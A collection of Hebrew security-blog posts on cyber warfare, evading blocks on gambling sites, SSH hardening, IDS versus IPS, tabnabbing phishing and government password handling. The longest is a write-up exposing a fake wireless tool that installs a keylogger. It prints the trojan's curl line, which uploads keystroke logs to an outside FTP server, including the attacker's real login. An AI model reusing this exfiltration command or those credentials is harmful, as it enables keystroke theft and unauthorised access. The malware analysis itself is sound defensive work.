אוהד פלוטניק שמנהל במיקרוסופט את ה-Security User Group שאל אותי לפני כמה חודשים אם אוכל להרצות בנושא מעניין לקבוצה.
אחרי המון זמן שניסינו לתאם את זה, ההרצאה שלי תתקיים ביום רביעי הקרוב.
נושא ההרצאה:
סייבר WARFARE , סכנות ברמת מדינה, מערך הגנה ברמת המדינה.
יהיו שם טעימות מנושאים שונים כגון פשעי רשת, טרור קיברנטי וכן הנושא העיקרי – Cyber Warfare.
אתם מוזמנים.

ניתן להירשם פה:

https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032458904&Culture=he-IL

לפני מס' ימים התפרסמה באתר הפירסומים הממשלתי www.pirsum.gov. המודעה הבאה :

ולעיתונות המודפסת נמסרה ההודעה הבאה :

נסיון Login לתיבה ב-gmail נתן את ההודעה הזאת:

מה שכמובן משאיר אותנו עם פתיחת התיבה על שמנו, וקבלת קורות חיים של מועמדים שכותבים :

וכמובן – דיסקרטיות זה חשוב.

ככל הנראה השימוש בתיבה של Gmail במקום בתיבה של תהיל"ה (תשתית הממשלה לעידן האינטרנט) נועד כדי לא לחשוף מי האישיות הפוליטית הבכירה שמחפשת איש תקשורת עם ניסיון במשברים תקשורתיים.

מסקנות :

1. כשמוסד ממלכתי רוצה להיות אנונימי שידאג לייצר תיבה בצורה אחראית. עדיף עם שם גנרי כמו  misra801@site.gov.il ואם זה יקר או מורכב בירוקרטית אפשר לנסות את tikshorett@lapam.gov.il (לשכת הפירסום הממשלתי) אני מאמין שהם יסתדרו עם הגדרת Forward, אבל אני לא בטוח שיסתדרו עם שיתוף פעולה חוצה משרדים ממשלתיים.

2. אין, אבל באמת אין על Copy Paste בדברים האלה. למה לייצר שגיאה בשם התיבה?

תודה ליניב אוביץ על הפוסט.

קראתי את הכתבה הזו בדה-מרקר על כך שהמשטרה ביקשה מספקיות אינטרנט לחסום אתרי הימורים.

מעניין. אני יכול לחשוב על כמה אתרים נוספים שהיה כדאי שיציעו לחסום כגון אתרי פדופיליה, אתרי שינאה, אתרי סקס ועוד סוגים רבים של אתרים. (וברצינות, אני חושב שאסור לחסום שום דבר. ניטרליות.)

למה ניטפלו דווקא לאתרי הימורים? זאת שאלה נהדרת.

אם תשאלו אותי, כנראה שהיגעו למסקנה שהאתרים האלה מזינים את עולם הפשע הפיסי והמוחשי (משפחות הפשע וכ"ו).

אם זה באמת הדבר (ואני לא מרמז על כך כי פשוט אין לי מושג) אני יכול להבין את העובדה שהמשטרה תבקש לחסום אתרים כאלה. להבין. זה לא אומר שאני מסכים עם חסימה כזו בשום צורה.

אני חייב לציין שלדעתי יש כמה וכמה אתרים שהיו ראויים יותר להיחסם והזכרתי חלק מהם קודם כגון אתרי פדופיליה ושינאה וגם אותם הייתי מעדיף שלא יחסמו כי ניטרליות הרשת חשובה יותר.

הנקודה שמעניינת אותי היא השאלה האם באמת אפשר לחסום אתרים כאלה שמרוויחים כסף רב ויכולים להשקיע סכומים נכבדים כדי להמשיך להרוויח כסף.

איך לעקוף חסימת אתרי הימורים? איך לעקוף חסימת אתרים?

יש כמה וכמה פתרונות שיאפשרו למהמר הישראלי להמשיך להוציא את כספו.

פתרון קל וזול: תיעול התעבורה דרך רשת המאפשרת אנונמיות כגון TOR. מורידים דפדפן ייעודי ונגמר הסיפור של חסימת האתר כי כל התעבורה יוצאת ממקום אחר בעולם ולא מישראל. הבעיה העיקרית עם TOR היא איטיות.

פתרון קל וזמין: תיעול התעבורה בעזרת חיבור VPN אל חו"ל. פתרון כגון Hotspot Shield יאפשר לכם להמשיך להמר. יש הרבה פתרונות דומים שתוכלו למצוא ע"י גיגול hotspot VPN.

הבעיה עם תיעול תעבורה כזה היא שמישהו יכול לראות את התעבורה שלכם – אותו ספק שירותים.

דרך חכמה יותר לצאת על העולם היא לרכוש שרת VPS שלכם (עלות של כ-10$ לחודש) ולהתקין עליו מוצר כגון OPENVPN. בצורה זו תוכלו להמשיך להינות מאינטרנט מוצפן ומתועל דרך חו"ל אך בלי שמישהו יוכל להקליט בקלות את התעבורה שלכם. (ברור, ספק ה-VPS וספק האינטרנט עדיין יכולים לעשות זאת וגם שירותי הבטחון של המדינה ממנה רכשתם את השירות אבל הם פחות מאיימים מאשר ספק שירותים לא ידוע או מפעיל שרת TOR).

אני בטוח שאתתרי ההימורים יוכלו לספק די בקלות תוכנה שתיתן את האפשרות לעשות זאת בצורה אוטומטית ובהנחה שהם יהיו חכמים (והם יהיו. יש להם מספיק כסף ומוטיבציה) הם יוכלו די בקלות לעקוף את החסימה.

ההחלטה הזאת של המשטרה תעשה חודש של בעיה ואח"כ יצירת הפתרון הזמין והקל ללקוח ייכנס בתור חלק מההוצאות של האתרים. זה לא יהיה אפשרי לחסום אותם.

הפוסט הזה הוא תרגום של פוסט שלי (http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/) שחשבתי שיכול להתאים לפרסום בבלוג של גיא מכיוון שקהל היעד שלו הוא בעיקר אנשים שמתעסקים בהאקינג, אבטחת מידע או איך-שלא-תקראו-לזה… מקווה שתהנו (ותסלחו לי על הניסוחים הכושלים – כאמור זה תרגום).

בשבוע שעבר יצא לי "לשחק" קצת עם כלים לבדיקת רמת ההגנה של רשתות אלחוטיות בעקבות בקשה של לקוח "להריץ כלים לא שגרתיים כמו שכולם מריצים" (למרות הסלידה שלי מדרישות לכלים ספציפיים ו/או לספק רשימת מכולת של "מה אתה הולך להריץ"… נחש מה? לא משנה במה אני משתמש, אתה יכול להיות בטוח שבאיזשהו שלב אני הולך להפתיע אותך…).

במסגרת החיפוש, ובעזרתם המקרית של טק-קראנץ', הגעתי לאתר הזה המתיימר להיות מוקדש לאבטחת רשתות אלחוטיות. אז אחרי שהתגברתי על הבחילה הקלה מהעיצוב המזעזע (וכן – מוזיקת רקע באתר זה כל כך 90'…) הורדתי את 4 הקבצים האמורים להוות את הכלי. איפה ההתלבטות בכלל כשה-FBI משתמש באותם כלים…

בדיקה מהירה – ויש לנו שלושה סקריפטים (לכאורה) וזיפ (איך מתרגמים tarball לעברית? כדורזפת? טארבול?). למה לכאורה? מכיוון שכשסקריפט שאמור להיות טקסטואלי מזוהה על ידי המערכת כקובץ ELF אתה יודע שמשהוא "מסריח" קורה כאן. וכך התחיל הסיפור שנתן לי להגיע לסוף השבוע מחוייך ומבודח (בד"כ אני סתם מותש).

אז הנה סיכום "מנהלים" למה שקורה באתר של החבר שלנו שה-FBI משתמשים לכאורה בכלים שלו:

1. הכלים שהוא מספק אינם כלי אבטחת מידע בכלל. בהתחלה עוד נתתי לו להנות מהספק – נו, עוד מישהו שארז כלים ידועים בסקריפט משלו לצרכי נוחות.אבל לא. אפילו karma לא היתה כלולה שם – למרות שהסקריפט הראשי נקרא כך, ולמעשה זו הפונקציונליות שהכלי אמור היה לספק.
2. מבט זריז בזיפ מראה שהוא מכיל בכלל keylogger שנגנב מכאן.
3. כשהסקריפט הראשי מופעל, שני סקריפטים נוספים מופעלים ברקע – האחד מקמפל את ה-keylogger ומריץ אותו, והשני דואג להעלות את תעוד ההקלדות ל-FTP כדי שהמתקיף יוכל לעקוב אחריך.
4. במקביל, הסקריפט הראשי במסגרת "ההתקנה" דורש ממך לשלוח אימייל לכותב הכלי על מנת לקבל קוד אקטיבציה, ובאופן מאד נוח פותח עבורך את פיירפוקס (שועל-אש? שואש?) עם שלושה טאבים לגימייל, יאהו, והוטמייל. לטענת הסקריפט לאחר שליחת האימייל אתה אמור לקבל קוד אקטיבציה חינם אוטומטית.

נחזור ל"כלים" שלנו. כאמור הסקריפטים הם לא סקריפטים. מה נהיה? פשוט – הם היו פעם סקריפטים, אבל כדי לטשטש את מה שבאמת נעשה, הם "קומפלו" לקבצים בינריים באמצעות shc. המרת הקבצים הבינריים חזרה לסקריפטים היתה פשוטה למדי (שעורי בית -–לקרוא את התעוד של shc ולשחק עם הקבצים בבית).

עכשיו כשקצת יותר ברור מול מה אנחנו עומדים, בואו נסתכל על חלק מהקוד של הסקריפטים ומה עומד מאחוריהם. אפילו אם אתם לא סקריפטולוגים מהוללים, די קל לעקוב אחרי הנעשה (ויש אפילו הערות בקוד!!!).

אוקיי, אז אנחנו רואים איך ה-keylogger מקומפל ומותקן, ושני הסקריפטים הנוספים bg1.sh ו-bg2.sh מורצים ברקע. בשלב הבא, אנו מגיעים ל"התקנה" בה הסקריפט הראשי (כאמור karma.sh) מבקש מהמשתמש לשלוח אימייל לצרכי אקטיבציה המכיל הצהרה כי השימוש בכלי איננו משמש לעבירה על החוק.

הזכרתי כי ההתקפה כאן מכוונת לאנשים שמתעסקים באבטחת מידע והאקינג, והנה הוכחה נוספת:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

נחמד… מוודאים איתנו באיזה גירסה של BackTrack אנחנו משתמשים. לזכות כותב הסקריפט ייאמר שאכן ההתנהגות של הסקריפט משתנה בהתאם לגירסת מ"ה עליה אנחנו רצים (שינויי קונפיגורצית רשת וכו').

בשלב הבא מוודאים שהדפדפן סגור, ופותחים עבורנו את שלושת אתרי הוובמייל:

firefox https://login.yahoo.com/ &
sleep 4

firefox https://www.google.com/accounts/ManageAccount &

sleep 4

firefox http://home.live.com/

המתקיף רוצה כמובן שנבצע כניסה מלאה לאימייל שלנו (עם ניחוש לא רע המכסה את ספקי האימייל העיקריים), כדי שנשלח את הבקשה לקוד האקטיבציה – וכל זאת כאמור כאשר ה-keylogger עובד במרץ ברקע ומקליט כל הקלדה שלנו ושולח אותה ל-FTP. בדיוק כאן רוב המשתמשים ייפלו…

השלב הבא בסקריפט – האקטיבציה עצמה. או שלא.

############################

# DECOY FOR ACTIVATION CODE

clear

echo “”

read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls

sleep 3

echo “You have entered an invalid code ”

echo “”

exit

############################

יש להודות כי ההערות בגוף הסקריפט משעשעות – "פתיון" האקטיבציה די ברור כאן, ובמיוחד אהבתי את ההמתנה של שלוש השניות לפני שהמשתמש מיודע כי הקוד לא נכון. אפשר ממש להרגיש שהכלי עובד קשה כדי לוודא אותו ברקע. קלאסי!

זה פחות או יותר לשלב הניתוח הטכני של הקבצים המוצעים מהאתר. אבל לא הייתי טורח לכתוב את הפוסט הזה (ולתרגם אותו – שבינתיים לוקח לי יותר זמן מכתיבת הפוסט המקורי ), אלמלא הייתי נתקל בידידינו ההאקר המפורסם בצ'אט. אז האינטראקציה התחילה כשכתבתי אימייל על מנת לראות כיצד האקטיבציה קורה, ולאחר כיום קיבלתי תשובה (ממש "מענה אוטומטי"…):

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE

http://fadzilmahfodh.blogspot.com

אז לא רק שלא קיבלתי קוד אקטיבציה, הם "מכינים" אותו (מה זה אומר? הלכו לקטוף צמחים מיוחדים לקוד שלי?), אלא שאני מתבקש לתרום מעשר קל למסכן שעבד כל כך קשה על כתיבת כלי אבטחה משהו משהו ומעניק אותו בחינם לקהילה… אוקיי, אז עניתי בנימוס ש:

1. תודה – אני מחכה בכליון עיניים לקוד.

2. אני אשקול תרומה אולי אחרי שאנסה את הכלי.

ובמהרה קיבלתי מענה המציע לי לנסות כלי אחר (שבכלל לא קשור למה שהכלי המקורי אמור לעשות) בגרסת נסיון.

המממ, מעניין. למזלי השתמשתי בחשבון ספאמי של יאהו וכנראה שגם ידידינו… מי שלא מכיר, ביאהו אפשר לראות את הסטטוס של מי שאתה מתכתב אתו באימייל ולצ'וטט איתו דרך ממשק הווב אם הוא כרגע זמין! אז זה בדיוק מה שעשיתי…

—– Our chat on Wed, 7/7/10 2:53 PM —–

Iftach(2:34 PM): hey man

Iftach(2:34 PM): mind if a ask a couple of questions?

fadzilmahfodh(2:34 PM): okey

Iftach(2:35 PM): cool. I’m doing this research on security tools and their authors…

fadzilmahfodh(2:35 PM): okey

Iftach(2:35 PM): saw your tool and wanted to hear about how you got to write

it, how well is it distributed in the community etc…

Iftach(2:36 PM): does that activation thing a common practice with free tools?

fadzilmahfodh(2:36 PM): yes see, we need to maintain our website thus we need supporter

fadzilmahfodh(2:37 PM): everyday there are at least 500++ people asking for code

Iftach(2:37 PM): I see.

fadzilmahfodh(2:37 PM): i no longer able to provide for free

fadzilmahfodh(2:37 PM): too time consuming and i need to be compensated for my

time and effort

fadzilmahfodh(2:38 PM): hope you understand

המסכן צריך שיפצו אותו על ה"זמן והמאמץ". אוי-אוי-אוי (ותזכרו שכל המאמץ שלו מסתכם בסקריפט הונאה בלבד – הוא אפילו לא טרח לכלול איזשהו כלי לפריצת/ניתוח רשת אלחוטית שזמין באופן חופשי…)

Iftach(2:40 PM): now, about the tool – that’s a linux binary obviously (thought

it was a shell script at the beginning). Did you base it on something existing

or write yourself?

fadzilmahfodh(2:41 PM): i wrote it by my self then scramble the code

Iftach(2:41 PM): hence the activation i see…

fadzilmahfodh(2:42 PM): i can afford to give ‘free lunch’ to everybody. Hope

you understand

Iftach(2:43 PM): sure, i understand.

fadzilmahfodh(2:43 PM): So you interested in the software?

Iftach(2:44 PM): more from a research point of view – for an article I’m

writing

Iftach(2:44 PM): so, the installer you use, I see that it contains some

additional code that is being compiled on the client.

fadzilmahfodh(2:45 PM): Yes. The purpose is the code will be unique to user

hardware

Iftach(2:45 PM): and I saw that there were some FTP connections made? Is that

to verify that the client is a registered one?

fadzilmahfodh(2:46 PM): Well, that is another story…

Iftach(2:46 PM): I’m listening

fadzilmahfodh(2:46 PM): maybe some other time huh

Iftach(2:47 PM): OK. Last question – do you get a lot of account passwords

through that keylogger that sends the data to your FTP?

fadzilmahfodh(2:47 PM): sorry, no comment unless i am in court

בשלב הזה של "הראיון" שלנו, הבנתי שסיפור הכיסוי שלי הולך להיות יותר אמיתי ממה שחשבתי (ולהלן ה"מאמר" שאתם קוראים). אי אפשר להמציא שטויות כאלה, אז הייצי חייב לתעד את זה איכשהו…

Iftach(2:48 PM): aha, and it’s part of the installer because? just to make sure

people can send the activation email correctly?

Iftach(2:48 PM): Back to statistics, out of the average 500 ppl asking for

activation – how many passwords do you manage to grab?

fadzilmahfodh(2:49 PM): well, the ftp is to confirm that software match with

data in server

fadzilmahfodh(2:49 PM): if it does not match, it will fail to run

fadzilmahfodh(2:49 PM): or i can just change the data/activation code in the

server

fadzilmahfodh(2:49 PM): then everything will not run

Iftach(2:49 PM): and how does that relate to the keylogging?

fadzilmahfodh(2:50 PM): well, that i another story…

Iftach(2:51 PM): I mean – the keylogger data is sent to that FTP. Is that part

of the verification or is this a separate process?

Iftach(2:51 PM): So, on average, how many accounts you manage to get on that

FTP server per day?

fadzilmahfodh(2:51 PM): well, you do not even support my website and how the

hell am i going to tell you

Iftach(2:52 PM): Let’s just get it straight – I’m not going to “support” the

site… I’m just doing some research on security tools.

fadzilmahfodh(2:52 PM): bye

Iftach(2:53 PM): You are free to tell, or not if you don’t want to. But I’m

publishing the story as it is…

Iftach(2:53 PM): With your acknowledgment that you use a keylogger to steal your

site visitor passwords. Unless you want to be quoted otherwise in the story…

ונאמן להבטחתי לפדזיל (או איך שלא קוראים לחכמולוג שלנו), אני מפרסם את ה"ראיון" שלנו ללא שינויים משמעותיים.

אבל רגע – יש עוד! עוד? כן כן! הדובדבן על הקצפת היה בשלב ששכנעתע את עצמי להציק לידידינו רק עוד פעם אחת, ולנסות להיכנס ל-FTP שאליו הוא שולח את כל רישומי ההקלדות של המשתמשים שלו. הרי שם המשתמש והסיסמא היו באחד הסקריפטים (כאמור – "קימפול" שלהם לבינרי לא כל כך עובד עלינו…)

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

ואז הגיע המסך שהשאיר לי חיוך שהספיק לכל הסופ"ש:

כמו שאומרים priceless.

אבל אתם יודעים מה? זה הכל באשמתנו! אם היינו "תורמים" לבחור כמו שהוא בטח מתחנן לכל מי ששולח לו אימייל, אז אולי היה לו מספיק כסף כדי לשלם עבור החשבון FTP שלו ב-drivehq, והיה יכול לעשות עוד כסך מלגנוב כסף נוסף מכל מי שנפל בהונאה שלו וקיבל keylogger במתנה.

גדול מהחיים. אבל ברצינות – מוסר השכל קצר (אחרת גיא לא היה מפרסם את זה עכשיו כששנינו מרצים רציניים בטכניון ) גם כלי סקיוריטי, במיוחד ממקומות לא מוכרים, זכאים לבדיקה קצרה. אני אולי קצת אולד-פשן אבל אם אני לא רואה את קוד המקור היום, אני הולך לדייק בקטנות. תסתכלו, תנטרו (רשת, זכרון, דיסק), ותבדקו שוב. לפעמים זה אפילו משתלם…

חבר שלי, נתי כהן צמח, שלח לי את זה:

לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.

רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906

לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:
https://encrypted.google.com/search?hl=en&q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22

לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.
אז התחלתי לקרוא קצת את העמוד הקודם, והבנתי איך מחפשים:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=20100101

אז למה בעצם לא לעשות את זה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=2%2a
טוב, כי זה לא עובד…

אבל רגע, זה כן:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&Search=2???????

ROFL

תודה נתי

אז אם אתם כבר משתמשים בשירותים של גוגל, למה לא לעשות את זה מה-CLI?

מה אפשר לעשות?

• Blogger

$ google blogger post --title "foo" "command line posting"

• Calendar

$ google calendar add "Lunch with Jim at noon tomorrow"

• Contacts

$ google contacts list name,email > contacts.csv

• Docs

$ google docs edit --title "Shopping list"

• Picasa

$ google picasa create --album "Cat Photos" ~/photos/cats/*.jpg

• Youtube

$ google youtube post --category Education killer_robots.avi

אם אתם בעניין, תצטרכו את gdata-python-client library ואת googlecl.

יש כרגע גל של התקפות כנגד שרתי SSH.

ההתקפות הן מסוג Brute Force והן מבוצעות בשיטה מבוזרת (הרבה מחשבים תוקפים שכל אחד מנסה סיסמה או כמה סיסמאות).

מה אמורים לעשות?

1. לשנות את הסיסמה לקשה ומסובכת מספיק תוך שמירת מדיניות החלפה וכן נעילה לאחר מספר שגיאות. לחילופין אפשר וכדאי לאפשר גישה רק באמצעות מפתח ולא באמצעות סיסמה. כמובן שכדאי לגבות את המפתח..

2. אם יש לכם גישה באמצעות מפתח ואתם לא זקוקים לגישה עם סיסמה, לשנות את sshd_config כך שיכיל:

PasswordAuthentication no וגם ChallengeResponseAuthentication no. שימו לב לעשות זאת רק אחרי שיש לכם אפשרות גישה עם מפתח אחרת תנעלו לעצמכם את הגישה לשרת ולא תוכל להיכנס אליו בדרכים שיגרתיות!

Passwordless logins to ssh.

3. אם אתם מנהלים את השרת רק ממקום יחיד – אולי כדאי לנעול גישה לפורט 22 רק מה-IP שלכם. (ניתן לביצוע רק אם יש לכם IP קבוע).

בהצלחה.

בגלל iTunes.

התוכנה הזאת פשוט בלתי אפשרית.

המחשב הקודם שהיה לי האייפון התחבר וקיבל דרייבר בעייתי כך שאייטונז לא זיהה אותו. אי אפשר לסנכרן אלא אם כן מתקינים ידנית כל פעם את הדרייבר.

המחשב הוחלף והיה לי שבוע של חוסר צרות, הכל עבר כמו שצריך.

עכשיו אייטונז לא מזהה שהאאוטלוק שלי הוא ברירת מחדל ונותן בגלל זה את ההודעה האינפורמטיבית הבאה:

זהו. נמאס לי.

אני לא משוכנע שזאת האיכות המדהימה שסטיב ג'ובס רגיל לתת ללקוחות שלו ואני בטוח שיש כאלה שיאשימו את ה-WINDOWS, ה-OUTLOOK, כדור הארץ או כל דבר אחר.

העובדה היא שלי אין אלטרנטיבה שתפתור את הבעיה ולכן אני לא יכול להמשיך לעבוד עם המכשיר הזה עם כל האהבה שלי כלפיו.

הדבר היותר בעייתי בכל העניין הוא שאני שוקל טלפון עם אנדרוייד עליו. כן, עם כל האהבה שלי לגוגל.

מדהים לאן החיים מגלגלים אותנו.

אחד העובדים של גוגל התעצבן על RSnake שכתב על GOOGLE דברים לא מאוד נחמדים (בצדק?) על פרסום מוקדם מדי של הבאג שנמצא לאחרונה במערכות העזרה של מיקרוסופט.
הבחור הגיע לבלוג של RSnake וכתב הודעה "תמימה" בו הוא תמה למה RSnake אומר שגוגל עושה דברים לא ישרים מאחורי הגב שלנו.
התגובה של RSnake היתה להסביר שגם לבוא מתוך IP של עובד גוגל ולתמוהה על דברים כאלה בלי להזדהות שאתה עובד בגוגל זה דבר בעייתי.
צילום:

פה ההסבר:

הפעם אני מרוצה כי זה טרול תוצרת חוץ, טורקי (כנראה) שהחליט להשמיץ אותי ב-TWITTER..
Block and report SPAM..

אם מישהו יודע טורקית, מוזמן לתרגם..

כן, אני יודע ששמעתם על זה כבר, אבל ראיתם את ההדגמה הזו?

פעם כתבתי פוסט קטן באותו שם שבו די חיפפתי את השאלה הזאת שנשאלתי כל כך הרבה פעמים (וגם ספגתי על זה המון ביקורת, אבל יש לי עור עבה שמוגן בהרבה ריפוד ).

הסיבה לפוסט הזה הוא שהאתר Zone-H פירסם כמה סטטיסטיקות מעניינות.

למשל… מה יותר מאובטח, WINDOWS או LINUX? זו שאלת השאלות.

אם התשובה תיתבסס על מה פורצים יותר, Windows מאובטח יותר (זה פופוליזם, אני יודע. האמת היא שיש הרבה יותר שרתי לינוקס באינטרנט ולכן ברור שייפרצו יותר כאלה) :

מה הסיבה לפריצות?

הסיבות הנפוצות ביותר הן למטרות גאווה (תראו, אני גבר) ולמטרות כיף. שימו לב שהאקר מקצועי בתחום CyberCrime או בשירות הבטחון במדינות השונות לא יפרסם את הפריצות שלו לאתרים ולכן הסיבות האמיתיות (כסף או מודיעין) לא מופיעות פה.

איך פורצים אתר? (מה השיטות לפריצה של אתרים):

מעניין. יש התאמה חלקית עם הניתוח של OWASP לגבי הפגיעויות הנפוצות ביותר אבל לא התאמה מלאה.

ברור שחלק מהנושאים פחות מדברים אל גוף כמו OWASP שעוסק ב-WEB APPLICATIONS אבל המסר העיקרי בהבדל הזה בין הניתוחים הוא שצריך לראות את התמונה השלמה. זה גם מחזק את העובדה שניתוח סיכונים חשוב הרבה יותר מביצוע Pentest בלבד.

האמת היא שיש עוד כמה נושאים שאפשר להסיק מהסטטיסטיקה הזאת, אבל אני אשמור אותם לעצמי כרגע.

היה מאוד מעניין לקרוא את זה.

המקור פה:

http://www.zone-h.org/news/id/4735

חבר טוב שלי, ניב דוד, מחפש עבודה.

ניב הוא מקצוען אמיתי ואנו מכירים כבר הרבה שנים.

אני מאוד מעריך אותו, לדעתי הוא נכס אמיתי לארגון שצריך אנשים מקצוענים שגם חושבים.

ניב מחפש תפקיד מאתגר בתחומי ניהול טכנולוגי, אסטרטגיה טכנולוגית, ניהול לקוחות ופרוייקטים גלובליים מורכבים, אבטחת מידע, ניהול סיכונים, המשכיות עסקית ויעוץ רב-תחומי.

לניב יש נסיון ביעוץ ובניהול תהליכים ופרוייקטים מורכבים בחברות גלובליות, הדורשים שילוביות של תפיסה מערכתית, מוכוונות עסקית ופתרונות יישומיים, טכנולוגיים ואחרים. בעל הכרות נרחבת ונסיון עם טכנולוגיות מגוונות, אבטחת מידע (כולל ניהול סיכונים, המשכיות עסקית, תשתיות, מתודולוגיה, תקנים ורגולציה), פרוייקטים ארגוניים תפעוליים ועוד.

אם מישהו חושב על משרה, אשמח אם תיצרו עימי קשר ואעביר לו את המידע.

בשיעור שלימדתי אתמול בקורס CISO בטכניון הנושא היה Intrusion Detection and Response.

במהלך השיעור יש הסבר על נושאים רבים ומגוונים אך מה שרציתי לספר הוא העניין הבא:

לעיתים קרובות במהלך יעוץ שאני נותן בחברות שונות אני נתקל ברכיבי IPS מותקנים באזורים ברשת. (IPS הם ראשי תיבות של Intrusion Prevention System – מערכת למניעת פריצה רכיב דומה הוא IDS – ראשי תיבות של  – Intrusion Detection System וזו כמובן מערכת לזיהוי פריצה).

כשאנחנו מנתחים את הצורך הראשוני ברכיב אני מגלה שהדרישה היא "לדעת" בלבד, ללא צורך בתגובה אקטיבית מעבר להתרעה במידה שיש חשש לחדירה.

כשנשאלת השאלה מדוע בחרו ברכיב אקטיבי (IPS) ולא ב-IDS, אך אחד לא ממש יודע לענות. זה מה שהמליצה חברת היעוץ ואף אחד לא חשב אם זה באמת הרכיב הנכון.

אז מה הבעיה עם זה?

רכיבי IDS ו-IPS אמור להשקיף על הפקטות העוברות ברשת. הם מעבדים כל פקטה שהם רואים ומחליטים אם היא בעייתית או לא.

הם יכולים לבצע את ההחלטות לגבי פקטה בעייתית בצורות שונות אבל זה בד"כ בצורה של זיהוי חתימות או זיהוי אנומליות.

IDS ו-IPS הם רכיבים דומים שמגיבים בצורה שונה בעת גילוי פקטה בעייתית. השוני המהותי בין הרכיבים הוא איך הם מטפלים באירוע בו הם מגלים פקטה בעייתית.

IDS פשוט מתעד ומתריע על בעייה (זה יכול להיות ב-LOG או בצורות אחרות).

IPS הוא רכיב אקטיבי יותר ואם הוא מחליט שהפקטה בעייתית, IPS יכול (בנוסף לתיעוד והתרעה) להחזיר תגובה כגון הודעת RESET שתנתק את התקשורת עם התוקף שייצר את הפקטה הבעייתית.

אז למה לא תמיד לשים IPS?

הבעיה ברכיב IPS היא שהוא אקטיבי. קל מאוד להבין שהוא יושב ומשקיף על התעבורה.

לתוקף שמבין שיש IPS ברשת יש כמה אפשרויות, בינהן שתיים מאוד בעייתיות:

1.לבחון שיטות שבהן הוא יוכל "לחמוק" מהרכיב ברשת הביתית שלו ורק אז לבצע את ההתקפה ברשת היעד.

2. בהנחה ויש לו 0Day לרכיב – הוא יכול לנטרל את ה-IPS או לקבל אליו גישה כזו או אחרת שתעזור לו לבטל את הדיווח והתגובה על ההתקפה שהו מתכנן.

לעומת IPS, רכיב IDS ישב בצורה שקופה ויתעד את הבעיות כשברוב המקרים התוקף לא יבין שה-IDS מתעד את מעשיו או שרכיב כזה קיים בכלל ברשת.

אז נשאלת השאלה אם IDS הוא חף מהבעיות האלה, למה להשתמש בכלל ב-IPS?

כיוון שלעיתים רבות אנו זקוקים לרכיב הגנה אקטיבי שיכול להגיב באופן אוטומטי ללא התערבות לאיומים מוכרים ו-IPS עונה בדיוק על ההגדרה הזו.

אשמח לדעת מה היא השקפת העולם שלכם בנוגע לרכיבים האלה.

זו התקפה חדשה ומגניבה.

הרעיון הוא להוסיף סקריפט לאתר שימתין לזמן בו החלון אינו בפוקוס ועברתם ל-TAB אחר בדפדפן.

כאשר עברתם ל-TAB אחר האתר טוען עצמו מחדש לתוכן שונה – נניח תוכן שייראה כמו GMAIL, בנק וכ"ו.

יחד עם זה תוחלף הכותרת של הטאב, אם יש FAVICON יוחלף גם הוא.

כשתרצו להכנס ל-GMAIL שלכם אתם (בתקווה) תטעו ותכנסו ל-TAB הסורר וכך יצליחו לבצע עליכם פישינג מתקדם ומגניב.

סרטון שמראה את ההתקפה:

A New Type of Phishing Attack from Aza Raskin on Vimeo.

הגעתי לזה דרך דודו. תודה

עריכה:

אביב ראף עשה משהו יותר מפחיד. אותו דבר בלי JS. לא ייאמן.: http://avivraff.com/research/phish/article.php

כל כך רציני ש-NO SCRIPT עודכן להתמודד עם זה.

אם אתם רואים ב-TWITTER את המשפט הזה "haha this is the funniest video ive ever seen" נא לא ללחוץ על הלינק.

הוא מוביל לאתר hXXp://pc-tv.tv שבו תוכלו להידבק בסוסון חביב שעוד לא הספקתי לוודא מה הוא עושה.

זהירות..

בעלי עסקים מכירים את העניין של ללכת לשלם מע"מ ב-15 לחודש בכל חודש או חודשיים.

כשפתחתי את תיק העוסק שלי גיליתי שדברים השתנו וניתן לשלם מע"מ דרך האינטרנט באתר של רשות המיסים: https://www.shaam.gov.il/Shaam_internet.

זה שיפור עצום שלא צריך ללכת לבזבז זמן בדואר והם גם נותנים לכם את האפשרות לשלם ב-19 לחודש במקום ב-15. זה לא רע.

הרישום לשירות קליל אבל בסיום התהליך נדלקה לי נורת אזהרה כלשהי..

הדף המסכם הציג הודעה שהקוד שלי הוא XXX והסיסמה האישית שלי היא YYY. האם יכול להיות שהם שומרים את הסיסמה גלויה ולא מוצפנת ב-DB?

איך נברר את העניין? מעניין.

שיחת טלפון אל התמיכה. שכחתי סיסמה.

החבר'ה ביקשו ממני את מזהה המשתמש והסיסמה. הם ביקשו ממני את הסיסמה!

כשאמרתי להם את הסיסמה (היא הוחלפה מראש כך שלא ראיתי בכך בעיית אבטחה) הם אמרו לי שהסיסמה הוחלפה ונתנו לי את הסיסמה החדשה!

אכן – הסיסמה שמורה ללא הצפנה ב-DB. התומכים יכולים לראות את הסיסמאות שלנו.

חשוב להגיד:

1. יש הליך "קצר" לאחזור סיסמה. אתם נדרשים לענות על הפרטים הבאים:

חשוב להגיד שמספיק שטעיתם בפרט יחיד ולא תוכלו לשחזר סיסמה דרך האתר. אבטחה – 10. שימושיות – 0.

עוד נושא שרציתי להעלות כאן הוא הנושא הזה:

הרבה אתרים רשמיים דואגים לייצר מין הזדהות כפולה שכזו.

מספר תיק עוסק זה קל לגלות ומופיע בכל חשבונית כך שזה אינו יכול להיחשב כפרט מוסתר.

קוד משתמש וסיסמה הם פקטורי ההזדהות.

באותה שיחה שיזמתי שאלתי אם משנה אם התווים גדולים או קטנים בשם ובסיסמה. התשובה היתה שזה לא משנה.

מעניין.

